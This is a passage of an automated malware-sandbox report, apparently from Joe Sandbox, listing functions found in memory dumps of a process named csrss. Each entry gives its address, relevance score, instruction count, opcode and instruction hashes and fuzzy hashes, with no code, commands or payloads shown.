                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: af62d64c9eea5667c441b423537b2437a84c908086ff5a8e99bf5604b8924664
                                                      • Instruction ID: 9bc60aab2d95d71ba3516f50865908653f7a6e85a339ffa963ee6dbb17b3229c
                                                      • Opcode Fuzzy Hash: af62d64c9eea5667c441b423537b2437a84c908086ff5a8e99bf5604b8924664
                                                      • Instruction Fuzzy Hash: CBF06D7190E7C48FCB1AEA3488694547FA0EF6720174A46EEC085CF1A3EA2DCC89CB11
                                                      Function 00007FF848EBA859 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: c14079f909465edeacc4e4ac41ab61fc6129e76ed6af58be8bfd6d9e3434686b
                                                      • Instruction ID: 25fad13e3738dcfd67e17979f3d9864b2ea717ffd0f090844797d40fe1b96cf2
                                                      • Opcode Fuzzy Hash: c14079f909465edeacc4e4ac41ab61fc6129e76ed6af58be8bfd6d9e3434686b
                                                      • Instruction Fuzzy Hash: 40F06D7190E7C48FDB1AEB7888698557FA0EF6720174A42EFC045CF1A3EA2DC889C701
                                                      Function 00007FF848EBADE9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 1c3f5f7381fda12de9fd3b56ca3b5b258e950b3deb9177c500fe15ad4dde55b0
                                                      • Instruction ID: fab309a02eb38c18ccbe73b8a32d64f6c988185e2e3e8dcfb88004a3f5813fd3
                                                      • Opcode Fuzzy Hash: 1c3f5f7381fda12de9fd3b56ca3b5b258e950b3deb9177c500fe15ad4dde55b0
                                                      • Instruction Fuzzy Hash: CAE0487144E7D44FCB06EB3484698553F60EF6721578A40EEC045CF1B3E62D988AC701
                                                      Function 00007FF848EB2279 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 3a1ee097e8447e0de5faaae1d02f8aabf37f0114f9ac78b61e4219991670ecbc
                                                      • Instruction ID: 1f3aab2526cadab3994b5b12a911b89d2b7f9689e191491a9806ec64aeeabe8d
                                                      • Opcode Fuzzy Hash: 3a1ee097e8447e0de5faaae1d02f8aabf37f0114f9ac78b61e4219991670ecbc
                                                      • Instruction Fuzzy Hash: 49E01A7184E7C48FCB4AEB74886A9543FA0EE6B21178A40EEC045CF1B3E62D8849C701
                                                      Function 00007FF848E808D0 Relevance: .1, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3e566bcddaceac7ba290f6b837bda296372ecb05a6acb97fb844eae0e6da468d
                                                      • Instruction ID: eebe1cd7dd6ae7ee50465d11e2c191c19ace244f30b4e42783b47c81ffc9111c
                                                      • Opcode Fuzzy Hash: 3e566bcddaceac7ba290f6b837bda296372ecb05a6acb97fb844eae0e6da468d
                                                      • Instruction Fuzzy Hash: 7E41AF52A4E9592EE709B37CA0952FC7780EF45361F1841BFD04CC70D3DE2864818699
                                                      Function 00007FF848E80998 Relevance: .1, Instructions: 113COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ff01dcbb8fad0f739b4f925d2aca6fe67b47494a55b20430e2cabc1751936702
                                                      • Instruction ID: 2095179e5c276fff35548c9a196f1502a88f1b17e1e7f74f605b978d37cb4025
                                                      • Opcode Fuzzy Hash: ff01dcbb8fad0f739b4f925d2aca6fe67b47494a55b20430e2cabc1751936702
                                                      • Instruction Fuzzy Hash: 2431CD20B1D9595FEB88B72C944A7BD72C2FF99751F9400B9E80EC32D6DE38AC818645
                                                      Function 00007FF848E81171 Relevance: .1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e17c4f4774bafc440d196bf9f9e395c720ab9a5d4131107851619529df9f3072
                                                      • Instruction ID: 2be6c3af45126267e84e23460733430f1ed58d27bd9ecd8e1df65a2961587d55
                                                      • Opcode Fuzzy Hash: e17c4f4774bafc440d196bf9f9e395c720ab9a5d4131107851619529df9f3072
                                                      • Instruction Fuzzy Hash: 3F317E3190D68A8FDB46EB68C8659AD7BF1FF26340F4805FAC009D72A3DB39A844C751
                                                      Function 00007FF848EB2979 Relevance: .1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: abc5201d3bf48d6f532fc9f46dae3284417748f8bfb16af038bee4ecddce7207
                                                      • Instruction ID: 488d57df226086ee8f314acaddc54b96549d1e139deedd3335bbb04d3a6b1c82
                                                      • Opcode Fuzzy Hash: abc5201d3bf48d6f532fc9f46dae3284417748f8bfb16af038bee4ecddce7207
                                                      • Instruction Fuzzy Hash: 70318231E1C94A8FDB59EA18C4956A873E2FFA8394F04467AC00ED72C6DF78AC418785
                                                      Function 00007FF848E80960 Relevance: .1, Instructions: 91COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0378ff7ed68f68a7cfe5a58105f1753c0c79e5be56625cd470da80d2d6b9a2c3
                                                      • Instruction ID: 0642e7ef6e48916a42e25215fc4c1a0f1d51793a8785c85b63548b21457b08b7
                                                      • Opcode Fuzzy Hash: 0378ff7ed68f68a7cfe5a58105f1753c0c79e5be56625cd470da80d2d6b9a2c3
                                                      • Instruction Fuzzy Hash: FA213451A4DD5A3EF75CB27C644A2FC62C1EF483A1F6890BAE40DC31D3DE2CAC804699
                                                      Function 00007FF848E82A19 Relevance: .1, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 035c5ad3b146be40c5fbf1f7ea6f0c1f034e7770c03c8b43d4b1691ea0a8c3ca
                                                      • Instruction ID: e2916f8f3927bac2856ae2f3f79d098971771a8ef401f154be0260b14a816d97
                                                      • Opcode Fuzzy Hash: 035c5ad3b146be40c5fbf1f7ea6f0c1f034e7770c03c8b43d4b1691ea0a8c3ca
                                                      • Instruction Fuzzy Hash: 03214C21E0C90A8FEBA4FB6884587BC22D2FF94391F9546B5D40DD32A2DF38AC418758
                                                      Function 00007FF848E80C25 Relevance: .1, Instructions: 79COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6a9cb85d90d4f18db06203baf990c6006e871c005e10cf24dea2cab1469de9ee
                                                      • Instruction ID: 1f7f8fda6451ebf1505721d43828c150e6b4a3090ab9308927bf8d56434066ef
                                                      • Opcode Fuzzy Hash: 6a9cb85d90d4f18db06203baf990c6006e871c005e10cf24dea2cab1469de9ee
                                                      • Instruction Fuzzy Hash: B721D331A0D6899FE712FF28C8452EC7BA0FF42351F5445FAC0449B1D2DB3825498B65
                                                      Function 00007FF848E96D44 Relevance: .1, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7be91c1f0ae83a7bd133f5a664b60ff76be4261f50f5324b4559f2b67a2b8251
                                                      • Instruction ID: abbd0e3e283a064e2ebac4cda9bf775290763dd3cefe0422f784367c7492297c
                                                      • Opcode Fuzzy Hash: 7be91c1f0ae83a7bd133f5a664b60ff76be4261f50f5324b4559f2b67a2b8251
                                                      • Instruction Fuzzy Hash: EB117C21E0C91A4FEBA8FB6884516B872D2FF98344F9005BAD40EC72D6DF78AC024784
                                                      Function 00007FF848E83D85 Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 77e45b08667d33d5be409acf47bdbf2a14762a80f4568414b71f0f3db44fe95f
                                                      • Instruction ID: 8b38697993ee0e8305bc40efb57c14ca45f4e3cbfb9792ba3fb2e0cb9f8a2776
                                                      • Opcode Fuzzy Hash: 77e45b08667d33d5be409acf47bdbf2a14762a80f4568414b71f0f3db44fe95f
                                                      • Instruction Fuzzy Hash: 3A11DA70908A198FDB94EB08C894FA9B3E1FB58311F5441AAD40EE7290CB34AEC4CF85
                                                      Function 00007FF848E80C38 Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9c8e71e527a25eb60cc7bead8d924e8a5263c10bd80aa7d004665807ae16341d
                                                      • Instruction ID: 3e2ee4ab451bbfa1aa9779ae36a969c299aecd2b97b891b4c87c5861ffc68329
                                                      • Opcode Fuzzy Hash: 9c8e71e527a25eb60cc7bead8d924e8a5263c10bd80aa7d004665807ae16341d
                                                      • Instruction Fuzzy Hash: 74118E31A0D68D9FE702FB28D8452EC7FB0FF42351F5546F6C084DB292DA3856498B95
                                                      Function 00007FF848EB7180 Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3c6ddcd6c5a4e0267749aafe49e673e007e3ca6a37d52b8255175e7da3b0ae95
                                                      • Instruction ID: b71984adc48415056163cd267d1085e04ccf1c7d40b1c881cf8088fd84907d6f
                                                      • Opcode Fuzzy Hash: 3c6ddcd6c5a4e0267749aafe49e673e007e3ca6a37d52b8255175e7da3b0ae95
                                                      • Instruction Fuzzy Hash: B2014E56D8E5922ED70C76BCB8560F43B90EF0227AF0C90B7D08C8A153DE0954898799
                                                      Function 00007FF848EBD67A Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d545d5c4f559d65fb27a59029cd5e88dcfb5553f0817c3e178727397a6fd7536
                                                      • Instruction ID: 9e065ad7913122c7fc9236e25b6fe66172d404b65aa14e20e3944da5c799c150
                                                      • Opcode Fuzzy Hash: d545d5c4f559d65fb27a59029cd5e88dcfb5553f0817c3e178727397a6fd7536
                                                      • Instruction Fuzzy Hash: E5017132F089098FEB55EA58D4803FC77A2FBA83A1F094175D01DE71D5DB39A8828758
                                                      Function 00007FF848E80C40 Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7410dcb7c1c4af9ef551c4d3616ea0af4d1460fa92bfbc28acc681870fe0ae17
                                                      • Instruction ID: d85d40a25b7ff359e4467be9493c396adcc6bec3f2e1cfd15c1ab4406b8f88ac
                                                      • Opcode Fuzzy Hash: 7410dcb7c1c4af9ef551c4d3616ea0af4d1460fa92bfbc28acc681870fe0ae17
                                                      • Instruction Fuzzy Hash: 2D016931A0D6899FE702EB28C8542EDBFB0FF42350F5545E6C080DB292DA3856498B95
                                                      Function 00007FF848E944B1 Relevance: .0, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d8ad1ab5b87a28b0b99a930abff9c9a434606e57e53eaf8a08e68b3546d12f49
                                                      • Instruction ID: a91b8619bec2bf361a0c115887e1dd36093ec5f47597101b0e4213bdb8518002
                                                      • Opcode Fuzzy Hash: d8ad1ab5b87a28b0b99a930abff9c9a434606e57e53eaf8a08e68b3546d12f49
                                                      • Instruction Fuzzy Hash: A7F0FC31D0C5864FE766B66484142BA37D1BF96358F0902BBC44EC71D3DE7C99468355
                                                      Function 00007FF848E9833C Relevance: .0, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7901454d60a7d7dae9cdd1dbef10b0e65cecfbb325ba4d8d82df3c0180afc337
                                                      • Instruction ID: 1bcc153273e635023a5085625f2d3925bdc35962959c4365b321ff47c8c1c025
                                                      • Opcode Fuzzy Hash: 7901454d60a7d7dae9cdd1dbef10b0e65cecfbb325ba4d8d82df3c0180afc337
                                                      • Instruction Fuzzy Hash: 5F018B21E0C85A8FFA94FA548455AA83291FF55340F1442F6D80DD32D2CF38BD418B84
                                                      Function 00007FF848E80C48 Relevance: .0, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e420d1e6fe104e70cd10390f7e7ed5ef79254df7c0fb2f071e1fb7f4f16bc15a
                                                      • Instruction ID: 4417abdbef1c0bcda944008d119b87f96253d1a83ae4d7787a3e7108bee77af6
                                                      • Opcode Fuzzy Hash: e420d1e6fe104e70cd10390f7e7ed5ef79254df7c0fb2f071e1fb7f4f16bc15a
                                                      • Instruction Fuzzy Hash: 46015A7190D7899FE702EB68C84429DBFB0FF42354F5541EAD040DB292DA385A49CB91
                                                      Function 00007FF848E84F0E Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f77092a6c563991a8a072aefe2d442f085e99faaf1550a5570fcf6ab254ae2cb
                                                      • Instruction ID: 906f464cc8681ed34cd3079b9667eea8f322b7f57ea113cfaa3151e4066879db
                                                      • Opcode Fuzzy Hash: f77092a6c563991a8a072aefe2d442f085e99faaf1550a5570fcf6ab254ae2cb
                                                      • Instruction Fuzzy Hash: 8A018F31E0D9668FEB61FB28845467C7790FF55350FA401FAC44ED7282DF3929818785
                                                      Function 00007FF848E80C50 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fa75ccdf2b3aab6d1bcac7b5f1374372c33f4688e5763f8caf0d010090a013f0
                                                      • Instruction ID: ae587d8c9fa2b10dad1bb3720a8f5794a80afbf83b356ebd189300f2151b1652
                                                      • Opcode Fuzzy Hash: fa75ccdf2b3aab6d1bcac7b5f1374372c33f4688e5763f8caf0d010090a013f0
                                                      • Instruction Fuzzy Hash: E8014B7090D7899FE712EB64848429DBFB0FF02354F5441E6D440DB292DA385A48C755
                                                      Function 00007FF848EBAD59 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0137d537454019dbb374080674dc547e53d2e0856efe371c479ffea018196c71
                                                      • Instruction ID: fcca27f9d320b925f20e9cc32536dff977c6df31ca41e3e05c7aa82794f097c9
                                                      • Opcode Fuzzy Hash: 0137d537454019dbb374080674dc547e53d2e0856efe371c479ffea018196c71
                                                      • Instruction Fuzzy Hash: BBF0EC31B0CBC44FC729953D58590717FE1DB6B50234902FFC086C76A3DD55AC868341
                                                      Function 00007FF848E93FBF Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b70a9d54ae8882840df84be12b388b8565ec122fda0a77ec151b0f6123362baa
                                                      • Instruction ID: beec40a1d661fda6845e5fe6eb8bdb875e6cb8214a73f7f77c1d517449ed7b77
                                                      • Opcode Fuzzy Hash: b70a9d54ae8882840df84be12b388b8565ec122fda0a77ec151b0f6123362baa
                                                      • Instruction Fuzzy Hash: 87F03770E0890B8FEB98EA88C9656FE77B0FF55355F00063AC016C2294DF786A418A84
                                                      Function 00007FF848E82B3D Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 436df963ac4971543a82ffba23c3fc813e1d492e3c47f0be546b0eaff253ac19
                                                      • Instruction ID: 897828f0cad2904c0c3f1e321a18de19ee6196dcc1b12444fcd6fbfab5531f45
                                                      • Opcode Fuzzy Hash: 436df963ac4971543a82ffba23c3fc813e1d492e3c47f0be546b0eaff253ac19
                                                      • Instruction Fuzzy Hash: 72F0313094C85E8EEBB4FA14C8446EC73A2FF90391F9441F5C00DD31A2DF7869818B48
                                                      Function 00007FF848E80B77 Relevance: .0, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9e529a8971c0c08948b526ccec0418b06fdbf8e572ef88851ffba145a90c2298
                                                      • Instruction ID: 3d9fe52116f3cd3b994742c43faaa95fa8d6b8a69e088d83ccc2dfed2720d27b
                                                      • Opcode Fuzzy Hash: 9e529a8971c0c08948b526ccec0418b06fdbf8e572ef88851ffba145a90c2298
                                                      • Instruction Fuzzy Hash: 31F0E53525EA89DFD742AB3CC8A58D8BF60FF03204F5A02EAD089CB563C315585DCB41
                                                      Function 00007FF848EBB0DA Relevance: .0, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0632c1bb5ca69b2dfa0c7420c36e5504ff921517937fbf958f74a24f2d4911f6
                                                      • Instruction ID: 43aca0ba6e8474e38b8f545ab75262375fd0cefa1a79f335cb34b6ffae1f89d7
                                                      • Opcode Fuzzy Hash: 0632c1bb5ca69b2dfa0c7420c36e5504ff921517937fbf958f74a24f2d4911f6
                                                      • Instruction Fuzzy Hash: D5F05E20E1D94A8FE289FB1944993B972D1FFA8741F5401B9C40DD32C3DF3868C19749
                                                      Function 00007FF848E947C4 Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b1f6850ea463fbd98618da56179b592f4e9e7f7347a8285fffb6543d260b0736
                                                      • Instruction ID: 72dfe41cc1271e0580601fd6b3606b566de14bbf7e733d6eeb018244facd3da0
                                                      • Opcode Fuzzy Hash: b1f6850ea463fbd98618da56179b592f4e9e7f7347a8285fffb6543d260b0736
                                                      • Instruction Fuzzy Hash: 91F03A30D0C5064FEA58BA9894406B932D1FF45398F5145B5D85A83297DF78A8528688
                                                      Function 00007FF848E99302 Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a2c5ea5f636c987af263b5fdadf485b1e4b37b9572e46316133d7d0a7c0d2da8
                                                      • Instruction ID: 0f8b5b57bd63dcfd1c2f07b7a64f6f6c55e27444d5c6690cd51d635ba2b73a24
                                                      • Opcode Fuzzy Hash: a2c5ea5f636c987af263b5fdadf485b1e4b37b9572e46316133d7d0a7c0d2da8
                                                      • Instruction Fuzzy Hash: FDE03932A1C9098FEBA4FB68D4457EC73E1FF49350F5000B6D00EC7292CB34A8118B44
                                                      Function 00007FF848EB3459 Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b32827403d9754e2d7f93f846f53b8dba17095e34509aea7cab0fb39bbe534b6
                                                      • Instruction ID: a739e06f0e8502fe483e838922758398eaa7352804999297bed0dab5d7847b66
                                                      • Opcode Fuzzy Hash: b32827403d9754e2d7f93f846f53b8dba17095e34509aea7cab0fb39bbe534b6
                                                      • Instruction Fuzzy Hash: D5E09220609BC84FC70EA63848685607FB1EB6711178902DBC045CB2A3D919DC89C751
                                                      Function 00007FF848EB21E9 Relevance: .0, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f3ad7cffc902df96429ebf736261827b8904ec7145188199f9eeb50cb6e1ef7f
                                                      • Instruction ID: ba72e72833af96ee131c3f19372bec77b25fe385a5b738d822424ac03b9dd320
                                                      • Opcode Fuzzy Hash: f3ad7cffc902df96429ebf736261827b8904ec7145188199f9eeb50cb6e1ef7f
                                                      • Instruction Fuzzy Hash: 79E0D830B197C44FC70DA63C8869524BBB1EF67102B8952FEC445CB1A3DA19DC85C741
                                                      Function 00007FF848EBD969 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
